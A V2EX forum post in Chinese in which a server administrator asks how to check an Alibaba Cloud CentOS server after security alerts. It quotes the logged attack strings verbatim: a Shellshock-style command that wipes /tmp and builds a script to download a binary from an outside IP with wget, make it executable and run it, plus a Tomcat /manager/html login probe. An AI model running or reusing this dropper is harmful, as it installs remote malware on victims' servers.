服务器是阿里云的ECS,系统是centos 6.5 x64,阿里云盾检测到一次“代码 /命令执行”类型的攻击,攻击特征如下:
我的 IP/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.174.5.7:1552/hhu -o /tmp/china.z-mvrw. >> /tmp/
run.sh;echo echo by china.z >> /tmp/
run.sh;echo chmod 777 /tmp/china.z-mvrw. >> /tmp/
run.sh;echo /tmp/china.z-mvrw. >> /tmp/
run.sh;echo rm -rf /tmp/
run.sh >> /tmp/
run.sh;chmod 777 /tmp/
run.sh;/tmp/
run.sh.
还有这样的:
我的 IP/manager/html Match1:/manager/html Match2:get /manager/html http/1.1..content-type: text/html..host: 我的 ip..accept: text/html, */*..user-agent: mozilla/3.0 (compatible; indy library)..authorization: basic og==
请问这样的情况下,我改怎么检查我的服务器,实在不知道要怎么处理了。
/tmp 目录下 200 多个这种类型的文件。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
https://www.v2ex.com/t/308599
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.